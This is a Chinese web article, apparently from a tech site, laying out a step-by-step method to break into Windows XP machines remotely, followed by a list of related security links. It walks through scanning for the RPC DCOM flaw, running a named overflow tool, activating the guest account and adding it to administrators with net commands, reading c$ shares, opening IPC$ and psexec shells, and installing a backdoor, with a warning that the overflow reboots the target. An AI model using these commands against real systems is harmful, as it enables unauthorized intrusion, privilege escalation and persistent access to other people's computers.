1.思路:突破xp系统远程访问的限制,实现文件传输和远程登陆。
2.工具:rpc漏洞扫描工具、溢出工具,pstools工具包。
3.步骤
1)步骤一:rpc漏洞扫描:
推荐使用retinarpcdcom.exe
图形界面,在剑鹰网络安全小组有下载。
2)步骤二:远程溢出:
在剑鹰网络安全小组有很多该类工具下载,我用xp.exe,溢出成功率极高。
3)步骤三:提升guest权限(本方案之关键):
命令:net user guest /active:yes
net localgroup aministrators guest /add
——————————————————————————————
看到这里,也许你会嗤之以鼻,
可这正是大家忽略的地方,因为guest有与其它所有帐号不同的特性。
如果你用net user guest命令,将会看到下面的内容:
Password required No
这正是突破xp系统远程访问帐号限制的突破口!
除了guest外,其它帐号都是
Password required yes
所以就算你有xp系统的管理员帐号密码一样无所作为。
——————————————————————————————
当guest提升为admin权限后,你试试
dir \\IP\c$Content$nbsp;
现在你已经有了读写权限,连ipc$连接都省了~~
当然你也一样可以用net use \\ip "" /user:"guest"来进行IPC$连接。
到此,文件传输的问题已经解决!
4)步骤四:远程登陆
我们当然不想每次用溢出登陆对方。
那么就试试opentelnet吧
>opentelnet \\ip guest "" 1 90
read ntlm failed \\shit!用administrator也是这样子。
上传srv.exe试试,我没试过,有兴趣的自己试试。
因为我认为用psexec方便多了。命令如下:
psexec \\ip cmd
5)关于后门:
各显神通,我正好用来试试榕哥的bits.dll,感觉一点都不好。
6)注意事项:
千万别在xp系统中建新帐户(为什么?自己想想)
xp系统默认只能登陆一个帐户,故用3389的远程登陆是不行的。
rpc溢出会导致对方重启,要慎用,尤其是服务器。本文:http://www.qqread.com/safe-tech/s111164072.html
更多内容请看系统优化大全、系统安全设置、系统安装手册专题,或进入讨论组讨论。
相关图文阅读
频道图文推荐
健 康 咨 询
时 尚 咨 询
相关专题
- 路由器安全设置 详解 (338次浏览)
- 安全与速度的较量:VPN路由器大比拼 (198次浏览)
- gdwli32盗号木马清除方法及专杀工具 (185次浏览)
- 交换机及路由器如何更加安全 教你六大规则 (85次浏览)
- Javqhc木马清除方法及专杀工具 (85次浏览)
- 十七点安全知识详解进程和病毒知识 (75次浏览)
- 保护电脑安全的第一步:密码保护 (65次浏览)
- 抚平Windows系统的“伤口” (56次浏览)
- 巧用Syskey命令保障系统安全 (55次浏览)
- 密码破解必备秘籍 密码遗忘通关手册 (52次浏览)
